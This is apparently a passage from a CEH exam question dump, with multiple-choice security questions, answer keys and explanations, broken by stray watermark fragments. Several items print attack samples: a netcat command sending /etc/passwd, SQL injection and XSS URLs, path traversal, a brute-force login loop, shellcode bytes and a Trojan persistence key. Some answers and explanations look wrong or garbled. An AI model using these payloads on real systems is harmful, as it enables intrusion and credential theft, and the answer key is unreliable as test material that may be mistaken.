0/tcp open http
35/tcp open loc-srv
39/tcp open netbios-ssn
89/tcp open LDAP
43/tcp open https
m
65/tcp open smtps
029/tcp open ms-lsa
433/tcp open ms-sql-s
.co
301/tcp open compaqdiag
sts
555/tcp open freeciv
800/tcp open vnc-http
900/tcp open vnc
lTe
000/tcp filtered X11
Remote operating system guess: Windows XP, Windows 2000, NT4 or 95/98/98SE
tua
map run completed -- 1 IP address (1 host up) scanned in 3.334 seconds
Using its fingerprinting tests nmap is unable to distinguish between different groups of Microsoft
Ac
based operating systems - Windows XP, Windows 2000, NT4 or 95/98/98SE.
What operating system is the target host running based on the open ports shown above?
A. Windows 98 SE
B. Windows 2000 Server
C. Windows NT4 Server
D. Windows XP
Answer: B
Explanation:
The system is reachable as an active directory domain controller (port 389, LDAP)

QUESTION NO: 188
Frederickson Security Consultants is currently conducting a security audit on the networks of

Hawthorn Enterprises, a contractor for the Department of Defense.Since Hawthorn Enterprises
conducts business daily with the federal government, they must abide by very stringent security
policies. Frederickson is testing all of Hawthorn's physical and logical security measures including
biometrics, passwords, and permissions.
The federal government requires that all users must utilize random, non-dictionary passwords that
must take at least 30 days to crack.Frederickson has confirmed that all Hawthorn employees use
a random password generator for their network passwords.The Frederickson consultants have
saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and
crack the network passwords.
What method of attack is best suited to crack these passwords in the shortest amount of time?
m
A. Birthday attack
B. Brute service attack
C. Brute force attack
.co
D. Dictionary attack
sts
Answer: C
Explanation:
lTe
The most effective means of password attack is brute force, in a brute force attack the program
will attempt to use every possible combination of characters. While this takes longer then a
dictionary attack, which uses a text file of real words, it is always capable of breaking the
tua
password.
Ac
QUESTION NO: 189
What does the following command in netcat do?
nc 55555 < /etc/passwd
A. loads the /etc/passwd file to the UDP port 55555

B. logs the incoming connections to /etc/passwd file
C. deletes the /etc/passwd file when connected to the UDP port 55555
D. grabs the /etc/passwd file when connected to UDP port 55555
Answer: D
Explanation:

-l forces netcat to listen for incoming connections.
-u tells netcat to use UDP instead of TCP
-p 5555 tells netcat to use port 5555
< /etc/passwd tells netcat to grab the /etc/passwd file when connected to.
QUESTION NO: 190
Which of the following Exclusive OR transforms bits is NOT correct?
A. 0 xor 0 = 0
B. 1 xor 0 = 1
C. 0 xor 1 = 1
D. 1 xor 1 = 1
Answer: D
m
QUESTION NO: 191
.co
Once an intruder has access to a remote system with a valid username and password, the
sts
attacker will attempt to increase his privileges by escalating the compromised account to one
having increased privileges, such as that of an administrator. What would be the best
lTe
countermeasure to protect against such escalation?
A. Give users tokens

B. Give user the least amount of privileges
tua
C. Give users a strong policy document

D. Give users two passwords
Ac
Answer: B
Explanation:
With less privileges it is harder to increase the privileges.
QUESTION NO: 192
Steven is a senior security analyst for a state agency in Tulsa, Oklahoma. His agency is currently
undergoing a mandated security audit by an outside consulting firm. The consulting firm is halfway
through the audit and is preparing to perform the actual penetration testing against the agency's
network. The firm first sets up a sniffer on the agency's wired network to capture a reasonable
amount of traffic to analyze later. This takes approximately 2 hours to obtain 10 GB of data. The
consulting firm then sets up a sniffer on the agency's wireless network to capture the same
amount of traffic.This capture only takes about 30 minutes to get 10 GB of data.
Why did the capturing of traffic take much less time on the wireless network?
A. Because all traffic is clear text, even when encrypted

B. Because wireless networks cannot enable encryption
C. Because wireless traffic uses only UDP which is easier to sniff
D. Because wireless access points act like hubs on a network
Answer: D
Explanation:
You can not have directed radio transfers over a WLAN. Every packet will be broadcasted as far
as possible with no concerns about who might hear it.
QUESTION NO: 193
m
How would you describe a simple yet very effective mechanism for sending and receiving
.co
unauthorized information or data between machines without alerting any firewalls and IDS's on a
network?
sts
A. Crafted Channel
B. Deceptive Channel
C. Bounce Channel
lTe
D. Covert Channel
Answer: D
tua
Explanation:
A covert channel is described as: "any communication channel that can be exploited by a process
to transfer information in a manner that violates the systems security policy." Essentially, it is a
Ac
method of communication that is not part of an actual computer system design, but can be used to
transfer information to users or system processes that normally would not be allowed access to
the information.
QUESTION NO: 194
While probing an organization you discover that they have a wireless network. From your attempts
to connect to the WLAN you determine that they are using MAC filtering by using ACLs on the
access points. What would be the easiest way to circumvent this and connect to the WLAN?
A. Steal a client computer and use it to access the wireless network

B. Attempt to brute force the access point and update or delete the MAC ACL's

C. Attempt to crack the WEP key using Airsnort
D. Sniff traffic off the WLAN and spoof your MAC address to the one that you have captured
Answer: D
Explanation:
The easiest way to gain access to the WLAN would be to spoof your MAC address to one that
already exists on the network.
QUESTION NO: 195
Dan is conducting a penetration testing and has found a vulnerability in a Web Application which
gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this
token. However, the session ID manager (on the server) checks the originating IP address as well.
Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might
m
not be able to get an interactive session?
A. Dan cannot spoof his IP address over TCP network

.co
B. The server will send replies back to the spoofed IP address
C. Dan can establish an interactive session only if he uses a NAT
sts
D. The scenario is incorrect as Dan can spoof his IP and get responses
Answer: B
lTe
Explanation:
Spoofing your IP address is only effective when there is no need to establish a two way
tua
connection as all traffic meant to go to the attacker will end up at the place of the spoofed address.
Ac
QUESTION NO: 196
You receive an e-mail with the following text message.
"Microsoft and AOL today warned all customers that a new, highly dangerous virus has been
discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your
computer, you have been infected and your computer is now running a hidden server that allows
hackers to access your computer. Delete the file immediately. Please also pass this message to
all your friends and colleagues as soon as possible."
You launch your antivirus software and scan the suspicious looking file hidserv.exe located in
c:\windows directory and the AV comes out clean meaning the file is not infected. You view the file
signature and confirm that it is a legitimate Windows system file "Human Interface Device
Service".

What category of virus is this?
A. Spooky Virus
B. Virus hoax
C. Polymorphic Virus
D. Stealth Virus
Answer: B
QUESTION NO: 197
Eve is spending her day scanning the library computers. She notices that Alice is using a
computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice's
machine. From the command prompt, she types the following command.
m
.co
For /f okens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:dministrator?%%a
What is Eve trying to do?

sts
A. Eve is trying to carry out a password crack for user Administrator

B. Eve is trying to escalate privilege of the null user to that of Administrator
lTe
C. Eve is trying to connect as an user with Administrator privileges

D. Eve is trying to enumerate all users with Administrative privileges
Answer: A
tua
Explanation:
Eve tries to get a successful login using the username Administrator and passwords from the file
Ac
hackfile.txt.
QUESTION NO: 198
Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website
is located at http://www.masonins.com/. Joseph uses his laptop computer regularly for website
administration. One night, an associate notifies Joseph that the main Mason Insurance web site
had been vandalized! In place of the legitimate content, the hacker had left a message ''H@cker
Mess@ge: Y0u @re De@d! Fre@ks! ''
Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's
internal network using his laptop. However, no changes were apparent to him and he could see
the legitimate content. Joseph was puzzled when another employee called in to report the defaced
website.

Joseph logged off the company's internal LAN and accessed the company Web site using his dial-
up ISP connection. He browsed to http://www.masonins.com/ and saw the following on the web
page:
H@ckermailto:H@cker Mess@gemailto:Mess@ge: Y0u @re De@dmailto:De@d!

Fre@ksmailto:Fre@ks!
After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal
network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against
the entire Web site, and found that every system file and all the Web content on the server were
intact.
How did the attacker accomplish this hack?
m
A. ARP spoofing
B. Routing table injection
C. SQL injection
D. DNS poisoning
.co
sts
Answer: D
Explanation:
lTe
External calls for the Web site has been redirected to another server by a successful DNS
poisoning.
tua
QUESTION NO: 199
Stephanie works as a records clerk in a large office building in downtown Chicago.On Monday,
Ac
she went to a mandatory security awareness class (Security5) put on by her company's IT
department.During the class, the IT department informed all employees that everyone's Internet
activity was thenceforth going to be monitored.
Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or
worse get her fired.Stephanie's daily work duties only consume about four hours of her time, so
she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet
but definitely does not want to get fired for it.
What should Stephanie use so that she does not get in trouble for surfing the Internet?
A. Stealth Firefox
B. Cookie Disabler

C. Stealth Anonymizer
D. Stealth IE
Answer: C
QUESTION NO: 200
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
B.
http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass
wd%3d%27hAx0r%27%3b--%00
C.
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser
m
ver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
.co
D. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
Answer: B
sts
Explanation:
Explantion: The correct answer contains the code to alter the usertable in order to change the
password for user smith to hAx0r
lTe
QUESTION NO: 201

tua
Liza has forgotten her password to an online bookstore. The web application asks her to key in her
email so that they can send her the password. Liza enters her email liza@yahoo.com'. The
Ac
application displays server error. What is wrong with the web application?
A. The email is not valid

B. User input is not sanitized
C. The ISP connection is not reliable
D. The web server may be down
Answer: B
Explanation:
All input from web browsers, such as user data from HTML forms and cookies, must be stripped of
special characters and HTML tags as described in the following CERT advisories:
http://www.cert.org/advisories/CA-1997-25.html
http://www.cert.org/advisories/CA-2000-02.html

QUESTION NO: 202
You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create an
executable file chess.exe. This Trojan when executed on the victim machine, scans the entire
system (C:\) for data with the following text "Credit Card" and "Password". It then zips all the
scanned files and sends an e-mail to a predefined hotmail address.
You want to make this Trojan persistent so that it survives computer reboots. Which registry entry
will you add a key to make it persistent?
A. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
B. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Start
C. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Desktop
m
D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Answer: D .co
Explanation:
HKEY_LOCAL_MACHINE would be the natural place for a registry entry that starts services when
sts
the MACHINE is rebooted.

lTe
QUESTION NO: 203
You are trying to break into a highly classified top-secret mainframe computer with highest security
tua
system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional
hacking doesn't work in this case, because organizations such as banks are generally tight and
secure when it comes to protecting their systems. In other words you are trying to penetrate an
Ac
otherwise impenetrable system.
How would you proceed?
A. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the
Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques
B. Look for "zero-day" exploits at various underground hacker websites in Russia and China and
buy the necessary exploits from these hackers and target the bank's network
C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using
100,000 or more "zombies" and "bots"
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or
disgruntled employee, and offer them money if they'll abuse their access privileges by providing
you with sensitive information

Answer: D
QUESTION NO: 204
You come across a WiFi network in your neighborhood. You pull up your hardware WiFi sniffer
from your car and tune into 802.11a network to sniff the Wireless traffic for sensitive data. What
frequency will you tune the Wireless hardware device to?
A. 900MHz-2.462 GHz
B. 5.15-5.825 GHz
C. 2.323-2.462 GHz
D. 2.412-2.462 GHz
Answer: B
m
Which programming language is NOT vulnerable to buffer overflow attacks?
sts
A. Assembly Language
B. C++
C. ActiveX
lTe
D. Java
Answer: D
tua
Explanation:
Perl and Java has boundary checking, hence buffer overflows don't occur. On the other hand, Perl
Ac
and Java don't offer access to the system that is as deep as some programs need.
QUESTION NO: 206
SNMP is a protocol used to query hosts, servers, and devices about performance or health status
data. Hackers have used this protocol for a long time to gather great amount of information about
remote hosts. Which of the following features makes this possible?
A. It uses TCP as the underlying protocol

B. It uses a community string sent as clear text
C. It is susceptible to sniffing
D. It is used by ALL devices on the market

Answer: B,C
Explanation:
SNMP uses UDP, not TCP, and even though many devices uses SNMP not ALL devices use it
and it can be disabled on most of the devices that does use it. However SNMP is susceptible to
sniffing and the community string (which can be said acts as a password) is sent in clear text.
QUESTION NO: 207
Fingerprinting an Operating System helps a cracker because:
A. It doesn't depend on the patches that have been applied to fix existing security holes
B. It opens a security-delayed window based on the port being scanned
C. It informs the cracker of which vulnerabilities he may be able to exploit on your system
D. It defines exactly what software you have installed
m
Answer: C
Explanation:
.co
When a cracker knows what OS and Services you use he also knows which exploits might work
sts
on your system. If he would have to try all possible exploits for all possible Operating Systems and
Services it would take too long time and the possibility of being detected increases.
lTe
QUESTION NO: 208

tua
A program that defends against a port scanner will attempt to:
A. Log a violation and recommend use of security-auditing tools

Ac
B. Update a firewall rule in real time to prevent the port scan from being completed
C. Sends back bogus data to the port scanner
D. Limit access by the scanning system to publicly available ports only
Answer: B
QUESTION NO: 209
Statistics from cert.org and other leading security organizations have clearly shown a steady
increase in the number of hacking incidents against companies. What do you think is the main
reason we have seen such a huge increase in hacking attempts over the past years?
A. Increase in processing power

B. It is getting harder to hack and more challenging for non technical people
C. The ease of getting hacker tools on the Internet
D. New TCPIP stack features are constantly being added
Answer: C
Explanation:
Today you don't need to be a good hacker in order to break in to various systems, all you need is
the knowledge to use search engines on the internet.
QUESTION NO: 210
Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has
been breached by an outside attacker.After performing routine maintenance on his servers, he
discovers numerous remote tools were installed that no one claims to have knowledge of in his
m
department.
.co
Gerald logs onto the management console for his IDS and discovers an unknown IP address that
scanned his network constantly for a week and was able to access his network through a high-
sts
level port that was not closed.Gerald traces the IP address he found in the IDS log to a proxy
server in Brazil.
lTe
Gerald calls the company that owns the proxy server and after searching through their logs, they
trace the source to another proxy server in Switzerland.Gerald calls the company in Switzerland
that owns the proxy server and after scanning through the logs again, they trace the source back
tua
to a proxy server in China.
What tool has Gerald's attacker used to cover their tracks?

Ac
A. IAS
B. Cheops
C. ISA
D. Tor
Answer: D
Explanation:
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and
security on the Internet. It also enables software developers to create new communication tools
with built-in privacy features. It provides the foundation for a range of applications that allow
organizations and individuals to share information over public networks without compromising their
privacy. Individuals can use it to keep remote Websites from tracking them and their family
members. They can also use it to connect to resources such as news sites or instant messaging

services that are blocked by their local Internet service providers (ISPs).
QUESTION NO: 211
You want to carry out session hijacking on a remote server. The server and the client are
communicating via TCP after a successful TCP three-way handshake. The server has just
received packet #120 from the client. The client has a receive window of 200 and the server has a
receive window of 250. What is the range of packet sequence numbers that would be accepted by
the server?
A. 121-371
B. 120-370
C. 200-250
D. 121-231
m
E. 120-321
Answer: A .co
Explanation:
Package number 120 have already been received by the server and the window is 250 packets,
sts
so any package number from 121 (next in sequence) to 371 (121+250).

lTe
QUESTION NO: 212
Henry is an attacker and wants to gain control of a system and use it to flood a target system with
tua
requests, so as to prevent legitimate users from gaining access. What type of attack is Henry
using?
Ac
A. Henry is using a denial of service attack which is a valid threat used by an attacker
B. Henry uses poorly designed input validation routines to create or alter commands to gain
access to unintended data or execute commands
C. Henry is executing commands or viewing data outside the intended target path
D. Henry is taking advantage of an incorrect configuration that leads to access with higher-than-
expected privilege
Answer: A
Explanation:
Henry's intention is to perform a DoS attack against his target, possibly a DDoS attack. He uses
systems other than his own to perform the attack in order to cover the tracks back to him and to
get more "punch" in the DoS attack if he uses multiple systems.

QUESTION NO: 213
Steve scans the network for SNMP enabled devices. Which port number Steve should scan?
A. 161
B. 169
C. 150
D. 69
Answer: A
Explanation:
The SNMP default port is 161. Port 69 is used for tftp, 150 is for SQL-NET and 169 is for SEND.
QUESTION NO: 214
m
The GET method should never be used when sensitive data such as credit card is being sent to a
.co
CGI program. This is because any GET command will appear in the URL, and will be logged by
any servers. For example, let's say that you've entered your credit card information into a form that
uses the GET method. The URL may appear like this:
sts
https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234
lTe
The GET method appends the credit card number to the URL. This means that anyone with
access to a server log will be able to obtain this information.
tua
How would you protect from this type of attack?
A. Replace the GET with POST method when sending data

Ac
B. Encrypt the data before you send using GET method

C. Never include sensitive information in a script
D. Use HTTPS SSLv3 to send the data instead of plain HTTPS
Answer: A
Explanation:
If the method is "get", the user agent takes the value of action, appends a ? to it, then appends the
form data set, encoded using the application/x-www-form-urlencoded content type. The user agent
then traverses the link to this URI. If the method is "post" --, the user agent conducts an HTTP
post transaction using the value of the action attribute and a message created according to the
content type specified by the enctype attribute.

QUESTION NO: 215
What is the command used to create a binary log file using tcpdump?
A. tcpdump -r log
B. tcpdump -l /var/log/
C. tcpdump -vde log
D. tcpdump -w ./log
Answer: D
Explanation:
tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type
] [ -w file ] [ expression ]
-w Write the raw packets to file rather than parsing and printing them out.
m
QUESTION NO: 216
.co
Jonathan being a keen administrator has followed all of the best practices he could find on
sts
securing his Windows Server. He renamed the Administrator account to a new name that cannot
be easily guessed but there remain people who attempt to compromise his newly renamed
administrator account. How can a remote attacker decipher the name of the administrator account
lTe
if it has been renamed?
A. The attacker used the sid2user program

tua
B. The attacker guessed the new name

C. The attacker used the user2sid program
D. The attacker used NMAP with the V switch
Ac
Answer: A
Explanation:
User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a
remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and
more. These utilities do not exploit a bug but call the functions LookupAccountName and
LookupAccountSid respectively. What is more these can be called against a remote machine
without providing logon credentials save those needed for a null session connection.
QUESTION NO: 217
Take a look at the following attack on a Web Server using obstructed URL:

http://www.example.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63
%2f%70%61%73%73%77%64
This request is made up of:

.%2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../
.%65%74%63 = etc
.%2f = /
.%70%61%73%73%77%64 = passwd
.
How would you protect from these attacks?
A. Configure the Web Server to deny requests involving "hex encoded" characters
B. Use SSL authentication on Web Servers
C. Create rules in IDS to alert on strange Unicode requests
D. Enable Active Scripts Detection at the firewall and routers
m
Answer: C
Explanation:
.co
This is a typical Unicode attack. By configuring your IDS to trigger on strange Unicode requests
sts
you can protect your web-server from this type of attacks.
lTe
QUESTION NO: 218
Steven the hacker realizes the network administrator of Acme Corporation is using syskey in
tua
Windows 2000 Server to protect his resources in the organization. Syskey independently encrypts
the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the
passwords. Steven must break through the encryption used by syskey before he can attempt to
use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker"
Ac
targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He
needs to configure the encryption level before he can launch the attack. How many bits does
Syskey use for encryption?
A. 64-bit encryption
B. 128-bit encryption
C. 40-bit encryption
D. 256-bit encryption
Answer: B
Explanation:
SYSKEY is a utility that encrypts the hashed password information in a SAM database using a
128-bit encryption key.

QUESTION NO: 219
A simple compiler technique used by programmers is to add a terminator 'canary word' containing
four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are
terminated. If the canary word has been altered when the function returns, and the program
responds by emitting an intruder alert into syslog, and then halts what does it indicate?
A. A buffer overflow attack has been attempted

B. A buffer overflow attack has already occurred
C. The system has crashed
D. An intrusion detection system has been triggered
E. A firewall has been breached and this is logged
Answer: A
m
Explanation:
.co
Terminator Canaries are based on the observation that most buffer overflows and stack smash
attacks are based on certain string operations which end at terminators. The reaction to this
observation is that the canaries are built of NULL terminators, CR, LF, and -1. The undesirable
sts
result is that the canary is known.

lTe
QUESTION NO: 220
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.
tua
Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;

Ac
After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
What attack is being depicted here?
A. Cookie Stealing
B. Parameter Manipulation
C. Session Hijacking
Answer: B
Explanation:
Cookies are the preferred method to maintain state in the stateless HTTP protocol. They are
however also used as a convenient mechanism to store user preferences and other data including
session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by
the client and sent to the server with URL requests. Therefore any malicious user can modify
cookie content to his advantage. There is a popular misconception that non-persistent cookies
cannot be modified but this is not true; tools like Winhex are freely available. SSL also only
protects the cookie in transit.
QUESTION NO: 221
Given the following extract from the snort log on a honeypot, what do you infer from the attack?
m
.co
sts
lTe
tua
Ac
A. A new user id was created

B. The exploit was not successful
C. The exploit was successful
D. A new port was opened
Answer: B
Explanation:
The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.
QUESTION NO: 222
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in
the program exploit.c
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
What is the hexadecimal value of NOP instruction?
A. 0x60
B. 0x70
C. 0x80
D. 0x90
Answer: D
m
Finding tools to run dictionary and brute forcing attacks against FTP and Web servers is an easy
sts
task for hackers. They use tools such as arhontus or brutus to break into remote servers.
CEH# ./rpa
lTe
Remote Password Assassin V 1.0

Roses Labs / w00w00
Usage: ./rpa <host> (options)
tua
Options:
-l : Login file to use.
-s : Use the same login.
Ac
-c : Password file to use.

-r : Attack FlowPoint Router.
-t : Attack Telnet Port.
-f : Attack FTP Port.
-p : Attack POP Port.
CEH# ./rpa 10.0.0.34 -t -f -c passwords.txt -s linksys
A command such as this, will attack a given 10.0.0.34 FTP and Telnet servers simultaneously with
a list of passwords and a single login name: linksys. Many FTP-specific password-guessing tools
are also available from major security sites.

What defensive measures will you take to protect your network from these attacks?
A. Never leave a default password

B. Never use a password related to your hobbies, pets, relatives, or date of birth.
C. Never use a password that can be found in a dictionary
D. Use a word that has more than 21 characters from a dictionary as the password
E. Never use a password related to the hostname, domain name, or anything else that can be
found with whois
Answer: A,B,C,E
QUESTION NO: 224
Consider the following code:
m
URL:http://www.xsecurity.com/search.pl?text=<script>alert(document.cookie)</script>
.co
If an attacker can trick a victim user to click a link like this, and the Web application does not
validate input, then the victim's browser will pop up an alert showing the users current set of
sts
cookies. An attacker can do much more damage, including stealing passwords, resetting your
home page, or redirecting the user to another Web site.
lTe
What is the countermeasure against XSS scripting?
A. Disable Javascript in IE and Firefox browsers

tua
B. Connect to the server using HTTPS protocol instead of HTTP

C. Create an IP access list and restrict connections based on port number
D. Replace "<" and ">" characters with ?lt;?and ?gt;?using server scripts
Ac
Answer: D
Explanation:
The correct answer contains a string which is an HTML-quoted version of the original script. The
quoted versions of these characters will appear as literals in a browser, rather than with their
special meaning as HTML tags. This prevents any script from being injected into HTML output, but
it also prevents any user-supplied input from being formatted with benign HTML.
QUESTION NO: 225
Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines
to create or alter SQL commands to gain access to private data or execute commands in the
database. What technique does Jimmy use to compromise a database?

A. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected
privilege of the database
B. Jimmy can submit user input that executes an operating system command to compromise a
target system
C. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate
a target system
D. Jimmy can gain control of system to flood the target system with requests, preventing legitimate
users from gaining access
Answer: C
Explanation:
SQL injection is a security vulnerability that occurs in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered for string literal escape
characters embedded in SQL statements or user input is not strongly typed and thereby
m
unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can
occur whenever one programming or scripting language is embedded inside another.
.co
QUESTION NO: 226
sts
Windows LAN Manager (LM) hashes are known to be weak. Select all of the following that are
weaknesses of LM?
lTe
A. Hashes are sent in clear over the network

B. Effective length is 7 characters
tua
C. Makes use of only 32-bit encryption

D. Converts password to uppercase
Answer: A,B,D
Ac
Explanation:
The LM hash is computed as follows. 1. The user's password as an OEM string is converted to
uppercase. 2. This password is either null-padded or truncated to 14 bytes. 3. The "fixed-length"
password is split into two 7-byte halves. 4. These values are used to create two DES keys, one
from each 7-byte half. 5. Each of these keys is used to DES-encrypt the constant ASCII string "
KGS!@#$% ", resulting in two 8-byte ciphertext values. 6. These two ciphertext values are
concatenated to form a 16-byte value, which is the LM hash.
The hashes them self are sent in clear text over the network instead of sending the password in
clear text.
QUESTION NO: 227

Which of the following represents the initial two commands that an IRC client sends to join an IRC
network?
A. LOGIN, USER
B. USER, PASS
C. USER, NICK
D. LOGIN, NICK
Answer: C
Explanation:
A "PASS" command is not required for either client or server connection to be registered, but it
must precede the server message or the latter of the NICK/USER combination. (RFC 1459)
QUESTION NO: 228
m
You are the senior security analyst for Hammerstreet Inc. located in Florida. Hammerstreet's
.co
primary product line revolves around high tech weapons developed for the US Army. For this
reason, your position as the head of logical security is vital in ensuring that no corporate secrets
are leaked. You are in the process of purchasing an IPS device for the network, so currently you
sts
only have an older IDS appliance sitting on the network.

lTe
On Monday morning when you get into work, you are alerted by your IDS that an outside IP is
scanning numerous ports on your network. You are then alerted by the IDS that it is getting
flooded by malformed packets to some commonly used ports such as ports 80, 135, 445, and 53.
tua
You logon to the IDS' management console and run TCP dump to a text file for a time range of 10
minutes. You open the file initially but it is very difficult to read. You eed a utility that can group all
the TCP packets in the file by their timestamps, to get a closer look at how much data is being
sent to your network in a given amount of time.
Ac
What utility could you use to examine the TCP dump file closer and make it more readable?
A. Tcpslice
B. WinPcap
C. TCPdump
D. IDSwakeup
Answer: A
QUESTION NO: 229

The FIN flag is set and sent from host A to host B when host A has no more data to transmit
(Closing a TCP connection). This flag releases the connection resources. However, host A can
continue to receive data as long as the SYN sequence numbers of transmitted packets from host
B are lower than the packet segment containing the set FIN flag.
A. True
B. False
Answer: A
Explanation:
For sequence number purposes, the SYN is considered to occur before the first actual data octet
of the segment in which it occurs, while the FIN is considered to occur after the last actual data
octet in a segment in which it occurs. So packets receiving out of order will still be accepted.
m
QUESTION NO: 230
.co
Steven works as a security consultant and frequently performs penetration tests for Fortune 500
companies.Steven runs external and internal tests and then creates reports to show the
companies where their weak areas are.Steven always signs a non-disclosure agreement before
sts
performing his tests.What would Steven be considered?
A. Blackhat Hacker
lTe
B. Whitehat Hacker
C. Grayhat Hacker
D. Bluehat Hacker
tua
Answer: B
Explanation:
Ac
A white hat hacker , also rendered as ethical hacker , is, in the realm of information technology, a
person who is ethically opposed to the abuse of computer systems. Realization that the Internet
now represents human voices from around the world has made the defense of its integrity an
important pastime for many. A white hat generally focuses on securing IT systems, whereas a
black hat (the opposite) would like to break into them.
QUESTION NO: 231
What is the purpose of firewalking?
A. It's a technique used to discover what rules are configured on a gateway

B. It's a technique used to discover interface in promiscuous mode

C. It's a technique used to map routers on a network link
D. It's a technique used to discover Wireless network on foot
Answer: A
Explanation:
Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular
packet can pass from the attacker's host to a destination host through a packet-filtering device.
This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can
determine whether packets with various control information can pass through a given gateway.
QUESTION NO: 232
Daryl is a network administrator working for Dayton Technologies. Since Daryl's background is in
web application development, many of the programs and applications his company uses are web-
m
based. Daryl sets up a simple forms-based logon screen for all the applications he creates, so
they are secure. .co
The problem Daryl is having, is that his users are forgetting their passwords quite often and
sts
sometimes he does not have the time to get into his applications and change the passwords for
them. Daryl wants a tool or program that can monitor web-based passwords and notify him when a
password has been changed so he can use that tool whenever a user calls him and he can give
lTe
them their password right then.
What tool would work best for Daryl's needs?

tua
A. WinHttrack
B. John the Ripper
C. L0phtCrack
Ac
D. Password Sniffer
Answer: D
Explanation:
L0phtCrack is a password auditing and recovery application (now called LC5 ), originally
produced by Mudge from L0pht Heavy Industries. It is used to test password strength and
sometimes to recover lost Microsoft Windows passwords.
John the Ripper is one of the most popular password testing/breaking programs as it combines a
number of password crackers into one package, autodetects password hash types, and includes a
customisable cracker. It can be run against various encrypted password formats including several
crypt password hash types
WinHttrack is a offline browser.
A password sniffer would give Daryl the passwords when they are changed as it is a web based

authentication over a simple form but still it would be more correct to give the users new
passwords instead of keeping a copy of the passwords in clear text.
QUESTION NO: 233
How many bits encryption does SHA-1 use?
A. 256 bits
B. 160 bits
C. 128 bits
D. 64 bits
Answer: B
Explanation:
m
SHA-1 (as well as SHA-0) produces a 160-bit digest from a message with a maximum length of 2
64 - 1 bits, and is based on principles similar to those used by Professor Ronald L. Rivest of MIT
.co
in the design of the MD4 and MD5 message digest algorithms.
sts
QUESTION NO: 234
You are having trouble obtaining accurate results while conducting a port scan against a target
lTe
network. You check for the presence of any security devices between you and the target system.
When both stealth and connect scans do not work, you decide to perform a NULL scan with
NMAP. The first few systems scanned shows all ports open. Which one of the following
tua
statements is most probably true?
A. The systems have all ports open

Ac
B. The systems are running a host based IDS

C. The systems are Web Servers
D. The systems are running Windows
Answer: D
Explanation:
The null scan turns off all flags, creating a lack of TCP flags that should never occur in the real
world. If the port is closed, a RST frame should be returned and a null scan to an open port results
in no response. Unfortunately Microsoft (like usual) decided to completely ignore the standard and
do things their own way. Thus this scan type will not work against systems running Windows as
they choose not to response at all. This is a good way to distinguish that the system being
scanned is running Microsoft Windows.

QUESTION NO: 235
Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT
department of his company installed a wireless network throughout the building. The problem is, is
that they are only going to make it available to upper management and the IT department.
Most employees don't have a problem with this since they have no need for wireless networking,
but Jeffery would really like to use wireless since he has a personal laptop that he works from as
much as he can.
Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned
down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get
access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless
